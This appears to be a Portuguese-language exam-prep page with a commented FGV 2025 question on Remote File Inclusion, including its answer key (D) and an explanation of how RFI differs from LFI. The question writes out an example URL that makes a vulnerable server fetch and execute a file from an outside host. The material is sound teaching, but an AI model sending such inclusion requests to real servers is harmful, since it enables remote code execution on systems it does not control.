← Questões de Segurança da Informação

Segurança da Informação · FGV · 2025

Questão comentada de Segurança da Informação

A página web da sociedade empresária Exemplo1234, disponível na internet, permite que internautas acessem o edital de uma vaga de trabalho por meio do endereço eletrônico http://empresa1234.com/vaga.php?file=vaga.pdf. Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada. Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php O teste foi realizado utilizando o seguinte endereço: http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança. O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o

Gabarito: D

A questão trata de inclusão de arquivo remoto, um clássico da segurança web. Aqui, o parâmetro file recebe uma URL externa e o servidor, sem validar nem sanitizar, busca esse conteúdo e ainda o executa como se fosse parte da própria aplicação. Esse comportamento abre a porta para que o atacante faça o servidor carregar código que está fora do domínio da empresa, o que caracteriza Remote File Inclusion, ou RFI. A lógica é simples: quando o sistema aceita um caminho ou endereço controlado pelo usuário e usa isso para incluir conteúdo, você precisa perguntar de onde vem o arquivo. Se vem do próprio servidor, o problema pode lembrar LFI. Se vem de fora, de um endereço remoto, a bandeira vermelha acende para RFI. No enunciado, o conteúdo de badpage.php foi hospedado em outro site e executado pelo servidor da Empresa1234, exatamente o cenário da inclusão remota. Em provas, a banca gosta de testar essa diferença entre local e remoto, porque a sigla parece irmã gêmea e derruba muita gente no automático. Em linhas gerais, LFI envolve arquivos locais do servidor; RFI envolve arquivo remoto, geralmente por URL. O resultado pode ser grave, como execução de código malicioso, o que compromete confidencialidade, integridade e disponibilidade. Não há um fundamento legal específico para definir a vulnerabilidade, porque isso é matéria técnica de segurança da informação, mas em termos doutrinários a classificação é bem consolidada em segurança web: inclusão de conteúdo externo sem controle adequado é RFI. Por isso, o gabarito é a letra D.

Continue treinando

Questões relacionadas